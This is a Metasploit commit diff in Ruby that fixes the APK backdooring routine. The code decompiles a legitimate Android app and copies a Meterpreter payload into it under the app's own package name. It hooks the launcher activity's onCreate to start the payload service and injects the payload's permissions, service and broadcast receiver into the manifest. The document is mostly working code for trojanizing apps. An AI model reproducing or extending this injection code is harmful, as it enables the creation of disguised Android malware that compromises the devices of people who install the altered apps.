Land #7362, Fix apk injection script to include android payload service and broadcast receivers
Brent Cook
commit
e5ac3eda61
|
|
@ -8,14 +8,7 @@ require 'fileutils'
|
|||
require 'optparse'
|
||||
require 'open3'
|
||||
|
||||
module Msf::Payload::Apk
|
||||
|
||||
class ApkBackdoor
|
||||
include Msf::Payload::Apk
|
||||
def backdoor_apk(apk, payload)
|
||||
backdoor_payload(apk, payload)
|
||||
end
|
||||
end
|
||||
class Msf::Payload::Apk
|
||||
|
||||
def print_status(msg='')
|
||||
$stderr.puts "[*] #{msg}"
|
||||
|
|
@ -65,62 +58,45 @@ module Msf::Payload::Apk
|
|||
end
|
||||
end
|
||||
|
||||
def fix_manifest(tempdir)
|
||||
payload_permissions=[]
|
||||
|
||||
#Load payload's permissions
|
||||
File.open("#{tempdir}/payload/AndroidManifest.xml","rb"){|file|
|
||||
k=File.read(file)
|
||||
payload_manifest=Nokogiri::XML(k)
|
||||
permissions = payload_manifest.xpath("//manifest/uses-permission")
|
||||
for permission in permissions
|
||||
name=permission.attribute("name")
|
||||
payload_permissions << name.to_s
|
||||
end
|
||||
def parse_manifest(manifest_file)
|
||||
File.open(manifest_file, "rb"){|file|
|
||||
data = File.read(file)
|
||||
return Nokogiri::XML(data)
|
||||
}
|
||||
|
||||
original_permissions=[]
|
||||
apk_mani=""
|
||||
|
||||
#Load original apk's permissions
|
||||
File.open("#{tempdir}/original/AndroidManifest.xml","rb"){|file2|
|
||||
k=File.read(file2)
|
||||
apk_mani=k
|
||||
original_manifest=Nokogiri::XML(k)
|
||||
permissions = original_manifest.xpath("//manifest/uses-permission")
|
||||
for permission in permissions
|
||||
name=permission.attribute("name")
|
||||
original_permissions << name.to_s
|
||||
end
|
||||
}
|
||||
|
||||
#Get permissions that are not in original APK
|
||||
add_permissions=[]
|
||||
for permission in payload_permissions
|
||||
if !(original_permissions.include? permission)
|
||||
print_status("Adding #{permission}")
|
||||
add_permissions << permission
|
||||
end
|
||||
end
|
||||
|
||||
inject=0
|
||||
new_mani=""
|
||||
#Inject permissions in original APK's manifest
|
||||
for line in apk_mani.split("\n")
|
||||
if (line.include? "uses-permission" and inject==0)
|
||||
for permission in add_permissions
|
||||
new_mani << '<uses-permission android:name="'+permission+'"/>'+"\n"
|
||||
end
|
||||
new_mani << line+"\n"
|
||||
inject=1
|
||||
else
|
||||
new_mani << line+"\n"
|
||||
end
|
||||
end
|
||||
File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani }
|
||||
end
|
||||
|
||||
def backdoor_payload(apkfile, raw_payload)
|
||||
def fix_manifest(tempdir)
|
||||
#Load payload's manifest
|
||||
payload_manifest = parse_manifest("#{tempdir}/payload/AndroidManifest.xml")
|
||||
payload_permissions = payload_manifest.xpath("//manifest/uses-permission")
|
||||
|
||||
#Load original apk's manifest
|
||||
original_manifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")
|
||||
original_permissions = original_manifest.xpath("//manifest/uses-permission")
|
||||
|
||||
manifest = original_manifest.xpath('/manifest')
|
||||
old_permissions = []
|
||||
for permission in original_permissions
|
||||
name = permission.attribute("name").to_s
|
||||
old_permissions << name
|
||||
end
|
||||
for permission in payload_permissions
|
||||
name = permission.attribute("name").to_s
|
||||
unless old_permissions.include?(name)
|
||||
print_status("Adding #{name}")
|
||||
original_permissions.before(permission.to_xml)
|
||||
end
|
||||
end
|
||||
|
||||
application = original_manifest.at_xpath('/manifest/application')
|
||||
application << payload_manifest.at_xpath('/manifest/application/receiver').to_xml
|
||||
application << payload_manifest.at_xpath('/manifest/application/service').to_xml
|
||||
|
||||
File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts original_manifest.to_xml }
|
||||
end
|
||||
|
||||
def backdoor_apk(apkfile, raw_payload)
|
||||
|
||||
unless apkfile && File.readable?(apkfile)
|
||||
usage
|
||||
raise RuntimeError, "Invalid template: #{apkfile}"
|
||||
|
|
@ -168,9 +144,7 @@ module Msf::Payload::Apk
|
|||
print_status "Decompiling payload APK..\n"
|
||||
run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload")
|
||||
|
||||
f = File.open("#{tempdir}/original/AndroidManifest.xml")
|
||||
amanifest = Nokogiri::XML(f)
|
||||
f.close
|
||||
amanifest = parse_manifest("#{tempdir}/original/AndroidManifest.xml")
|
||||
|
||||
print_status "Locating hook point..\n"
|
||||
launcheractivity = find_launcher_activity(amanifest)
|
||||
|
|
@ -194,15 +168,33 @@ module Msf::Payload::Apk
|
|||
raise RuntimeError, "Unable to find onCreate() in #{smalifile}\n"
|
||||
end
|
||||
|
||||
print_status "Copying payload files..\n"
|
||||
FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/")
|
||||
FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/"
|
||||
# Remove unused files
|
||||
FileUtils.rm "#{tempdir}/payload/smali/com/metasploit/stage/MainActivity.smali"
|
||||
FileUtils.rm Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/R*.smali")
|
||||
|
||||
payloadhook = entrypoint + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V"
|
||||
package = amanifest.xpath("//manifest").first['package']
|
||||
package_slash = package.gsub(/\./, "/")
|
||||
print_status "Adding payload as package #{package}\n"
|
||||
payload_files = Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/*.smali")
|
||||
payload_dir = "#{tempdir}/original/smali/#{package_slash}/"
|
||||
FileUtils.mkdir_p payload_dir
|
||||
|
||||
# Copy over the payload files, fixing up the smali code
|
||||
payload_files.each do |file_name|
|
||||
smali = File.read(file_name)
|
||||
newsmali = smali.gsub(/com\/metasploit\/stage/, package_slash)
|
||||
newfilename = "#{payload_dir}#{File.basename file_name}"
|
||||
File.open(newfilename, "wb") {|file| file.puts newsmali }
|
||||
end
|
||||
|
||||
payloadhook = entrypoint + %Q^
|
||||
invoke-static {p0}, L#{package_slash}/MainService;->startService(Landroid/content/Context;)V
|
||||
^
|
||||
hookedsmali = activitysmali.gsub(entrypoint, payloadhook)
|
||||
|
||||
print_status "Loading #{smalifile} and injecting payload..\n"
|
||||
File.open(smalifile, "wb") {|file| file.puts hookedsmali }
|
||||
|
||||
injected_apk = "#{tempdir}/output.apk"
|
||||
aligned_apk = "#{tempdir}/aligned.apk"
|
||||
print_status "Poisoning the manifest with meterpreter permissions..\n"
|
||||
|
|
|
|||
|
|
@ -320,7 +320,7 @@ module Msf
|
|||
gen_payload = raw_payload
|
||||
elsif payload.start_with? "android/" and not template.blank?
|
||||
cli_print "Using APK template: #{template}"
|
||||
apk_backdoor = ::Msf::Payload::Apk::ApkBackdoor::new()
|
||||
apk_backdoor = ::Msf::Payload::Apk.new
|
||||
raw_payload = apk_backdoor.backdoor_apk(template, generate_raw_payload)
|
||||
cli_print "Payload size: #{raw_payload.length} bytes"
|
||||
gen_payload = raw_payload
|
||||
|
|
|
|||
Loading…
Reference in New Issue